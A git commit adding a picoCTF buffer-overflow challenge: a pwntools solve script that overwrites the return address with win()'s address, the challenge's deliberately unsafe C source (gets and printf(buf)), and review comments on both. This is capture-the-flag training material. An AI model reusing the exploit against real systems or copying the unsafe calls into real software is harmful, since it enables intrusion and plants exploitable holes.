pwn/buffer_overflow_1

Oystein Kristoffer Tveit 2024-09-03 19:33:13 +02:00
parent 4c40d47aa5
commit 2e33defa56
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
3 changed files with 73 additions and 0 deletions

31
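--- a/pwn/buffer_overflow_1/solve.py
+++ b/pwn/buffer_overflow_1/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+from pwn import *
+exe = ELF("./vuln")
+context.binary = exe
+ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()
+def conn():
+if args.REMOTE:
+r = remote(ADDR, PORT)
+else:
+r = process([exe.path])
+return r
+def main():
+r = conn()
+r.recvuntil(b"Please enter your string:")
+offset = 44 # found with pwndbg
+payload = b'A' * offset + p32(exe.sym.win)
+r.sendline(payload)
+print(r.recvall())
+r.close()
+if __name__ == "__main__":
+main()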
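Review bot: `offset = 44 # found with pwndbg` in main() holds only for the exact `./vuln` build committed next to this script, and the comment does not say so. If the binary is rebuilt with another compiler or flags, the value silently goes stale. I would change the comment to `offset = 44  # measured in pwndbg against the committed ./vuln; re-measure if the binary changes`. Separately, `r.close()` is skipped whenever `recvuntil` or `recvall` raises, so the body after `r = conn()` belongs in a `try:` with `r.close()` under `finally:`. The star import `from pwn import *` also hides where `ELF`, `args`, `remote`, `process` and `p32` come from; an explicit `from pwn import ELF, args, context, p32, process, remote` reads better.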

BIN
pwn/buffer_overflow_1/vuln Executable file

Binary file not shown.


@ -0,0 +1,42 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
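Review bot: `#include "asm.h"` and the `get_return_address()` call in vuln() depend on a header that does not appear among the three files this commit adds, so the source as committed probably cannot be rebuilt to reproduce `vuln`. Either commit the header or add a top-of-file comment such as `/* challenge source kept for reference; intentionally unsafe; needs asm.h from the original challenge bundle */`. That comment would also mark the unbounded `gets(buf)` into `buf[BUFSIZE]` and the `printf(buf)` in win() as deliberate, so nobody mistakes them for code to reuse. Outside a challenge these would be `fgets(buf, sizeof buf, stdin)` and `printf("%s", buf)`. win() also never calls `fclose(f)`.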